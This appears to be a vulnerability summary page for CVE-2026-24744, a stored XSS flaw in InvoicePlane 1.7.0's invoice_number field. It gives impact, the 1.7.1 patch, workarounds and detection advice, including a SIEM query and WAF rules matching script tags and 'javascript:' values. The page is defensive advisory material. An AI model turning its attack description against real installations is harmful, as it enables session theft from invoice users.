CVE-2026-24744
📋 TL;DR
InvoicePlane 1.7.0 contains a stored XSS vulnerability in the Edit Invoices function where the invoice_number parameter lacks input validation. This allows authenticated administrators to inject malicious scripts that execute when other users view invoices, potentially compromising the application. Only InvoicePlane 1.7.0 installations are affected.
💻 Affected Systems
- InvoicePlane
📦 What is this software?
Invoiceplane by Invoiceplane
⚠️ Risk & Real-World Impact
Worst Case
An attacker with administrator access could inject persistent malicious scripts that steal session cookies, redirect users to phishing sites, or create backdoors for full application compromise when other users view invoices.
Likely Case
Malicious administrator or compromised admin account could inject scripts to steal session data from other users, potentially escalating privileges or exfiltrating sensitive invoice/client data.
If Mitigated
With proper input validation and output encoding, the vulnerability is eliminated. With least privilege access controls, impact is limited even if exploited.
🎯 Exploit Status
Exploitation requires administrator privileges. The vulnerability is straightforward to exploit once admin access is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.7.1
Vendor Advisory: https://github.com/InvoicePlane/InvoicePlane/security/advisories/GHSA-5mxx-553h-m62w
Restart Required: No
Instructions:
1. Backup your InvoicePlane installation and database. 2. Download InvoicePlane 1.7.1 from the official repository. 3. Replace the existing installation files with the new version. 4. Clear browser caches and test invoice editing functionality.
🔧 Temporary Workarounds
Input Validation Filter
allAdd custom input validation to sanitize invoice_number parameter before processing
Modify application code to validate/sanitize invoice_number input using HTML entity encoding
Content Security Policy
allImplement strict CSP headers to mitigate XSS impact
Add 'Content-Security-Policy' header with script-src 'self' directive
🧯 If You Can't Patch
- Restrict administrator account access to trusted personnel only and implement multi-factor authentication
- Implement web application firewall rules to block suspicious invoice_number parameter values containing script tags or JavaScript
🔍 How to Verify
Check if Vulnerable:
Check if running InvoicePlane version 1.7.0 by viewing the version in the application footer or checking the system settings pageCheck Version:
Check application footer or system settings in InvoicePlane web interfaceVerify Fix Applied:
After upgrading to 1.7.1, attempt to inject basic XSS payload in invoice_number field and verify it's properly sanitized when displayed📡 Detection & Monitoring
Log Indicators:
- Unusual invoice_number parameter values containing script tags or JavaScript code in web server logs
- Multiple failed login attempts followed by successful admin login
Network Indicators:
- Unusual outbound connections from InvoicePlane server after invoice viewing
- Suspicious JavaScript payloads in HTTP POST requests to invoice editing endpoints
SIEM Query:
source="web_server" AND (uri_path="/invoices/edit" OR uri_path LIKE "/invoices/%/edit") AND (param="invoice_number" AND value CONTAINS "<script>" OR value CONTAINS "javascript:")